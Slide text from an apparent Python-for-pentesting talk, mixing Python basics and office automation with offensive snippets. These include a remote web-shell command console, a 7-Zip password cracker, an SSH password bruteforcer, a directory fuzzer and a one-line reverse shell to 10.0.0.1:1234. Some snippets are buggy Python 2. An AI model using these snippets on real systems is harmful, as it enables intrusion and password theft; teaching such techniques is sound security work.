Why?

�  EASY (install, learn, code)

�  Tons of libraries

�  Code is easy to understand

�  Multiplatform

�  Good for prototyping

History

�  Conceived in late 80´s and first implementation in 1989

�  Created by Guido Van Rossum

�  Benevolent Dictator for Life

�  Actually there are two branches 2.x and 3.0

Python 101

�  Interpreted language

�  Object oriented

�  Indentation is significant in Python, block delimiter.

�  Usual control structures (if, while, etc)

�  Multiple levels of organization (function, classes, modules, packages)

Who is using Python?

�  ImmunityDebugger

�  Peach

�  Sulley

�  Paimei

�  Scapy

�  Spike Proxy

�  Core Impact

�  Canvas

�  W3AF

�  Sqlmap

�  Impacket

�  Google

Python 101

Data types: �  Strings - “Hello”

�  Numbers - 123

�  Lists – [‘hello’,’2’,’1’]

�  Tuples - (‘1’,’2’,’3’) (immutable)

�  Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}

Python 101

Structures:

list=[1,2,3,4,5]

for x in list: print x

if 3 > x: print “ 3 is bigger than” + x

else: print “ 3 is smaller than” + x

Python 101

Example Hello World:

print “Hello World”

With variables:

msg=“Hello World” print msg

Python 101

�  Interactive python shell

�  The commands execute line per line as you type

�  Good for testing small pieces of code as loops, regex, etc

�  Type “python” and enter to access the shell

Python 101

�  Strings starts counting in 0 and can have also negative indexes

�  msg[0] is H

�  msg[-1] is d

Basic Code bits

import sys ofile = ”names.txt” fil = open(ofile,'w’)

x = fil.readlines() for y in x:

print y

Urllib2

�  Library to deal with HTTP

import urllib2 response = urllib2.urlopen('http://python.org/') html = response.read() print html

Basic fuzzer

import sys, urllib2

ofile = ”dirs.txt”

fil = open(ofile,'w')

dirs = fil.readlines()

for x in dirs:

response = urllib2.urlopen('http://python.org/’+x) html = response.read()

Encoding

import base64

string=“TEST”

base64.standard_b64encode(string)

'VEVTVA=='

import hashlib m=hashlib.new('md5’) m.update(string) res = m.hexdigest() print res 033bd94b1168d7e4f0d644c3c95e35bf

Generic Console for Web Remote Execution

import httplib, urllib, sys

host=”XXXXXXXXXX”

while 1:

cmd=raw_input("Exploited@"+host+"#>")

if cmd=="exit":

sys.exit()

else:

h = httplib.HTTP(host)

cmd=urllib.quote(cmd)

print cmd

h.putrequest('GET',”/myconsole123/my-shell.jsp?pass=1231&cmd="+cmd)

h.putheader('Host', host)

h.putheader('User-agent', 'Internet Explorer 6.0 ')

h.endheaders()

returncode, returnmsg, headers = h.getreply()

response=h.getfile().read()

print response

7 Zip Cracker

import os, sys, pylzma

from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError

pas = open('passwords.txt', 'rb')

password=pas.readlines()

for x in password:

try:

fp = open('test.7z', 'rb')

archive = Archive7z(fp, password=x)

print ”The password is" + x

sys.exit()

except Exception, e:

fp.close()

A Web browser

#!/usr/bin/env python

import sys

from PyQt4.QtCore import *

from PyQt4.QtGui import *

from PyQt4.QtWebKit import *

app = QApplication(sys.argv)

web = QWebView()

web.load(QUrl("http://www.edge-security.com"))

web.show()

sys.exit(app.exec_())

One line Webserver

�  python -m SimpleHTTPServer 8080

SSH Bruteforcer

t = paramiko.Transport(hostname)

try:

t.start_client()

except Exception:

x = 0

try:

t.auth_password(username=username,password=passw)

except Exception:

x = 0

if t.is_authenticated():

print “Password found “ + passw

Proxy Strike Deflate Patch

�  Pd contains the POST DATA in the repeat function:

import zlib

defla= zlib.compress(pd)

Reverse Shell

import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

Win32Com

�  Library that allows us to access COM objects in Win32 systems

�  We can automate Word, Excel, Powerpoint, access WMI, AD, etc

Massive printing

from win32com import client

import time

word = client.Dispatch("Word.Application”)

def printPDFDocument(filename):

word.Documents.Open(filename)

word.ActiveDocument.PrintOut()

time.sleep(5)

word.ActiveDocument.Close()

word.Quit()

printPDFDocument("c:\\test.doc")

Excel Processing

from win32com.client import Dispatch

xlApp = Dispatch("Excel.Application")

xlApp.Visible = 1

xlApp.Workbooks.open("test.xls")

for x in range(1,100):

nombre=str(xlApp.ActiveSheet.Cells(x,5))

print nombre

xlApp.Quit()

WMI

import wmi

c = wmi.WMI ()

for process in c.Win32_Process ():

print process.ProcessId, process.Name

Interesting stuff

�  http://dirk-loss.de/python-tools.htm

�  http://code.activestate.com/recipes/langs/python/